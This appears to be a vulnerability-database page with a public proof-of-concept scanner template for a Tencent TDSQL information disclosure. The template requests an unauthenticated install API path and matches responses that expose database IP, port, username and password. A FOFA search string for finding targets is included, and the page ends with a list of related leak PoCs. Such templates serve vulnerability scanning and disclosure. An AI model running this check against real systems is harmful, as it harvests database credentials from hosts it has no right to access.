tencent-tdsql-leak: 腾讯 TDSQL 数据库信息泄露

漏洞描述

PoC代码[已公开]

id: tencent-tdsql-leak

info:
  name: 腾讯 TDSQL 数据库信息泄露
  author: zan8in
  severity: high
  verified: false
  description: |-
    fofa: app="TDSQL"
  tags: tencent,tdsql,leak,disclosure
  created: 2024/01/07

rules:
  r0:
    request:
      method: GET
      path: /tdsqlpcloud/index.php/api/install/get_db_info
    expression: |-
      response.status == 200 &&
      response.body.bcontains(b'"ip":"') &&
      response.body.bcontains(b'"port":"') &&
      response.body.bcontains(b'"user":"') &&
      response.body.bcontains(b'"pwd":"')
expression: r0()

相关漏洞推荐

• nsfocus-uts-password-leak: Nsfocus uts password leak
• firewall-password-leak: 防火墙硬编码漏洞
• svn-leak: SVM 代码托管泄漏
• POC aspcms-backend-leak: ASPCMS Backend Leak
• POC dlink-850l-password-leak: Dlink 850l Information Disclosure
• POC ecology-e-office-mysql-config-leak: 泛微OA E-Office mysql_config.ini 数据库信息泄漏
• POC hjtcloud-directory-file-leak: Hjtcloud Directory File Leak
• POC ruijie-eg-password-leak: Ruijie EG Information Disaclosure
• POC ruijie-nbr1300g-cli-password-leak: ruijie-nbr1300g-cli-password-leak
• POC seeyon-session-leak: Seeyon session leakage
• POC alibaba-canal-config-leak: Alibaba Canal config 云密钥信息泄露漏洞
• POC bohuawanglong-users-xml-password-leak: 博华网龙防火墙 users.xml 未授权访问
• POC csl-login-unauth-db-leak: CSL Login unauthorized DB Leak